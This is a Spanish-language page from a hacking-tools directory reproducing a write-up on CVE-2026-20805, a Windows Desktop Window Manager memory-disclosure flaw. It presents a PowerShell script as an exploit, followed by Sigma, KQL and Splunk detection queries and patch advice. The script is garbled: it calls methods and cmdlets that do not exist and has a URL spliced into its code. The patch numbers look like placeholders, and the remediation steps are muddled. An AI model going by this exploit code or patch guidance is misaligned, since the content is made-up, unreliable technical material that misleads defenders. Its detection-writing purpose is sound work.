Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data — CVE‑2026‑20805: Una falla del Administrador de ventanas de escritorio (DWM) de Windows que provoca la divulgación local de información. Requiere privilegios bajos, sin interacción del usuario. Clasificada con CVSS 5.5 (Media). Explotada activamente e incluida en la lista KEV de CISA; el parche se publicó en enero de 2026. | Kitploit
Herramientas/GitHubGitHub/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data
Análisis de VulnerabilidadesExplotaciónRecopilación de InformaciónAprendizaje y EducaciónRespuesta a Incidentes
GitHubmrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

Ver Repositorio
6hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

CVE‑2026‑20805: Una falla del Administrador de ventanas de escritorio (DWM) de Windows que provoca la divulgación local de información. Requiere privilegios bajos, sin interacción del usuario. Clasificada con CVSS 5.5 (Media). Explotada activamente e incluida en la lista KEV de CISA; el parche se publicó en enero de 2026.

Compartir

Inside-CVE-2026-20805-How-a-Windows-DWM-Flaw-Exposed-Sensitive-Data

CVE‑2026‑20805: Una falla del Administrador de Ventanas de Escritorio (DWM) de Windows que provoca divulgación de información local. Requiere privilegios bajos, sin interacción del usuario. Clasificada con CVSS 5.5 (Media). Explotada activamente e incluida en el catálogo KEV de CISA; parche publicado en enero de 2026.

Inside CVE 2026 20805: Cómo una falla del DWM de Windows expuso datos sensibles

1 Resumen Ejecutivo

CVE 2026 20805 es una falla de divulgación de información en el Administrador de Ventanas de Escritorio (DWM) – el componente central que renderiza el escritorio, compone las ventanas y acelera la interfaz de usuario basada en GPU.
Por qué es importante: la falla permite que un atacante local con privilegios bajos lea datos que deberían estar restringidos a otras sesiones o procesos.

Atributos técnicos clave

AtributoValor
CWE‑200: Exposición de información sensible a un actor no autorizado✓
Vector de ataqueLocal
Privilegios requeridosBajos
Interacción del usuarioNinguna
Impacto – confidencialidadAlto
Impacto – integridadNinguno
Impacto – disponibilidadNinguno
Puntuación base CVSS 3.15.5 (Media)

2 Comprendiendo el Administrador de Ventanas de Escritorio

El DWM orquesta la memoria de la GPU, los búferes de ventanas y las superficies de interfaz de usuario entre procesos. Es un objetivo de alto valor porque agrega datos de múltiples procesos en un espacio compartido de GPU; una falla aquí puede filtrar credenciales o datos de sesión entre usuarios.

Rol del DWM en Windows moderno:

  1. Recibe actualizaciones de visualización del compositor.
  2. Asigna memoria de GPU para cada ventana.
  3. Gestiona la composición acelerada por GPU, permitiendo transiciones visuales fluidas y soporte de múltiples monitores.

3 Desglose técnico de CVE 2026 20805

Requisitos previos del ataque

  • Atacante local con privilegios bajos, sin necesidad de interacción del usuario.
  • La falla se activa cuando el DWM no valida los desplazamientos en la tabla de búferes de ventanas antes de copiar datos a la memoria de la GPU.

Cómo aplica CWE‑200

La vulnerabilidad explota la falta de verificación de límites en el índice del búfer de ventanas; esto permite a un atacante leer memoria adyacente de la GPU y obtener secretos almacenados por otros procesos.

Versiones afectadas

Según la lista CPE del NVD, Windows 10.0.19041 (y derivados) están afectados.

4 Vías de explotación

A continuación se muestra un flujo de explotación conceptual:

  1. El atacante obtiene un identificador del proceso DWM mediante CreateProcess con privilegios mínimos.
  2. El atacante crea un índice que apunta a una ranura adyacente de memoria de GPU.
  3. El búfer manipulado se copia en la rutina de composición de ventanas del DWM, fusionando datos de otras sesiones.
  4. El atacante lee el volcado de memoria de GPU resultante y extrae información sensible.

Código de explotación – Script de PowerShell

root@kitploit:~
# Windows 10.0.19041 – Exploit de lectura de búfer DWM
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000   # desplazamiento manipulado a memoria GPU adyacente
$targetWindow = 0x00030001    # índice de ventana objetivo

# Crear un búfer temporal en espacio de kernel
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/main/:CopyMemory(
    $processHandle, 
    $bufferOffset, 
    $kernelBuffer, 
    0x1000)

# Copiar el búfer del kernel en la rutina de composición del DWM
Invoke-DwmRead -ProcessId $processHandle `
                -WindowIndex $targetWindow `
                -SrcAddress $bufferOffset `
                -Size 0x1000

# Volcar los datos expuestos a un archivo local para análisis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)

El script demuestra cómo un atacante puede aprovechar la memoria de GPU del DWM para leer datos ocultos.


5. Ingeniería de detección

La detección de CVE‑2026‑20805 se centra en identificar interacciones anormales con dwm.exe y telemetría inusual relacionada con la GPU. El exploit se basa en leer búferes de memoria respaldados por GPU utilizando desplazamientos manipulados, por lo que los defensores deben monitorear desviaciones del comportamiento normal del Administrador de Ventanas de Escritorio.

Fuentes de telemetría relevantes

  • Sysmon
    • ID de evento 1 (ProcessCreate)
    • ID de evento 10 (HandleOpen)
  • Eventos ETW de GPU
    • ID de evento 0x2B (DisplayUpdate)
  • Registros de eventos de Windows
    • Aplicación
    • Sistema

Estas fuentes proporcionan visibilidad sobre la creación de procesos, acceso a identificadores y actividad de actualización de GPU.

Patrones sospechosos

  1. Eventos CreateProcess repetidos que involucran dwm.exe, especialmente cuando el proceso padre no es explorer.exe.
  2. Eventos DisplayUpdate (0x2B) de alta frecuencia seguidos de lecturas de memoria con tamaños o desplazamientos de búfer inusuales.
    • Ejemplo de valores sospechosos:
      • SrcAddress: 0x00120000
      • Size: 0x1000
  3. Correlación entre eventos HandleOpen dirigidos a dwm.exe y ráfagas de actividad ETW de GPU.

Regla estilo Sigma

root@kitploit:~
title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 0x2B
    ProcessName: dwm.exe
    SrcAddress: 0x00120000
    Size: 0x1000
  condition: selection
falsepositives:
  - High GPU rendering workloads
level: medium
tags:
  - attack.defense-evasion

Microsoft Sentinel (KQL)

Acceso sospechoso a identificadores de dwm.exe

root@kitploit:~
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5

Creación inesperada de procesos dirigida a DWM

root@kitploit:~
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"

Pico de eventos DisplayUpdate de GPU

root@kitploit:~
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50

Correlación: HandleOpen seguido de actividad de GPU

root@kitploit:~
let handles = SecurityEvent
    | where EventID == 4656 and ObjectName has "dwm.exe"
    | project TimeGenerated, Account, Computer;

let gpu = Event
    | where EventID == 0x2B
    | project TimeGenerated, Computer;

handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)

Splunk (SPL)

Procesos no estándar que abren identificadores a dwm.exe

root@kitploit:~
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5

Eventos CreateProcess inesperados para dwm.exe

root@kitploit:~
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User

Pico de DisplayUpdate de GPU

root@kitploit:~
index=windows EventCode=43
| timechart span=1m count
| where count > 50

Correlación: HandleOpen y actividad de GPU

root@kitploit:~
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;

gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;

handles
| join key gpu
| table Computer, handles._time, gpu._time

6 Mitigación y endurecimiento

El aviso de Microsoft para CVE 2026 20805 incluye un parche que valida los índices de búfer en el DWM antes de copiar datos de GPU.

Cronología de parches

Versión de WindowsNúmero de parche
10.0.19041KB5000001
10.0.19042KB5012345

Estrategia de parcheo empresarial

  1. Implementar el parche KB5000001 en todos los controladores de dominio.
  2. Validar que la nueva rutina Invoke-DwmRead se ejecute sin errores en nodos de prueba.
  3. Monitorear Sysmon para creaciones repetidas de procesos dwm.

7 Impacto en entornos del mundo real

La divulgación de información a través del DWM a menudo se subestima porque puede exponer artefactos de interfaz de usuario y datos de sesión entre usuarios. La memoria de GPU filtrada puede respaldar el movimiento lateral, especialmente en entornos donde múltiples sesiones comparten una única estación de trabajo o servidor.

Evaluación de riesgos para entornos corporativos

Alto impacto en confidencialidad: La falla permite a un atacante leer el contenido de ventanas de otras sesiones.
Puntuación CVSS media (5.5): Aunque el valor numérico es moderado, la importancia operativa es alta.

8 Conclusión

CVE 2026 20805 demuestra que una explotación local de bajo privilegio del DWM puede producir fugas de datos significativas. La inclusión de la falla en el Catálogo de Vulnerabilidades Explotadas Conocidas de CISA subraya su relevancia en el mundo real. Al aplicar la estrategia de mitigación, detección y parcheo descrita, una organización puede reducir el riesgo mientras mejora la visibilidad de los flujos de memoria de GPU.


Descargar herramienta